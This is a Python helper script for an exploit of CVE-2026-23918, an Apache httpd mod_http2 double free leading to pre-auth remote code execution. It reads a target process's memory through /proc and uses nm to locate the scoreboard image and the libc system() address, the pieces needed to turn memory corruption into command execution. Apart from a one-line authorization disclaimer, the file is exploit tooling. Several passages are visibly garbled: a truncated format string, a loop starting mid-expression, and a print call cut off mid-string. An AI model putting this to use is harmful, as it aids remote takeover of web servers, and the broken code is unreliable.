#!/usr/bin/env python3 # For authorized security research and educational use only. Use only on systems you own or are explicitly authorized to test. """ CVE-2026-23918 - Apache httpd mod_http2 double-free, pre-auth RCE Helper that extracts scoreboard and system() addresses from /proc/PID/mem. Found and reported by: Bartlomiej Dmitruk (striga.ai) Stanislaw Strzalkowski (isec.pl) """ import struct, sys, os, re, subprocess def read_at(pid, addr, n): try: with open(f"/proc/{pid}/mem", "rb") as f: f.seek(addr) return f.read(n) except (OSError, ValueError): return None def u64(data, off=0): return struct.unpack_from("= 6 and p[-1].startswith('/') and p[-1] not in bases: bases[p[-1]] = int(p[0].split('-')[0], 16) for path, base in bases.items(): if not os.path.isfile(path): continue for flag in ("-D", ""): try: cmd = ["nm"] + ([flag] if flag else []) + [path] out = subprocess.check_output(cmd, stderr=subprocess.DEVNULL, text=True) except Exception: continue for ln in out.splitlines(): t = ln.split() if len(t) >= 3 and t[2].split("@")[0] == name: off = int(t[0], 16) with open(path, 'rb') as f: f.seek(16) etype = struct.unpack('servers[0][0].request: 0x{req_addr:x}", file=sys.stderr) else: print("ap_scoreboard_image symbol not found", file=sys.stderr) system_addr = sym(pid, "system") print(f"system: 0x{system_addr:x}")